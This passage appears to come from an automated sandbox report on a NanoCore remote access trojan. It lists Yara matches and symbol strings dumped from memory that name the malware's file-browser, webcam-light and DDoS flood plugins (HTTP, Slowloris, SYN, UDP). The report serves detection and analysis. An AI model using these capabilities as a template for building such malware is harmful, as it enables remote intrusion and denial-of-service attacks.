      Source: Yara matchFile source: 4.2.plugmancdht5461.exe.36dbcc8.7.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.plugmancdht5461.exe.36a90a8.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.RegSvcs.exe.36547bd.18.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.RegSvcs.exe.3650194.17.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.plugmancdht5461.exe.36a90a8.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.plugmancdht5461.exe.36dbcc8.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000009.00000002.690626467.00000000005A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000000.431404895.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000000.431645306.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000000.431151202.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000002.690522664.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.433826666.00000000036A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000000.430896595.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000002.691704162.0000000003649000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: plugmancdht5461.exe PID: 848, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 788, type: MEMORYSTR

      Remote Access Functionality

      barindex
      Detected Nanocore Rat
      Source: plugmancdht5461.exe, 00000004.00000002.433826666.00000000036A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exeString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000009.00000002.690626467.00000000005A0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000009.00000002.690947097.0000000002601000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000009.00000002.690947097.0000000002601000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: RegSvcs.exe, 00000009.00000000.431404895.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000009.00000002.691048568.000000000266B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000009.00000002.691048568.000000000266B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
      Source: RegSvcs.exe, 00000009.00000002.691048568.000000000266B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
      Source: RegSvcs.exe, 00000009.00000002.691048568.000000000266B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
      Source: RegSvcs.exe, 00000009.00000002.691048568.000000000266B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
      Source: RegSvcs.exe, 00000009.00000002.690772132.0000000000AB0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000009.00000002.690772132.0000000000AB0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
      Source: RegSvcs.exe, 00000009.00000002.690866803.0000000000B70000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000009.00000002.690866803.0000000000B70000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
      Source: RegSvcs.exe, 00000009.00000002.692471982.0000000003999000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000009.00000002.692471982.0000000003999000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
      Source: RegSvcs.exe, 00000009.00000002.692555556.00000000039B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000009.00000002.692555556.00000000039B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicro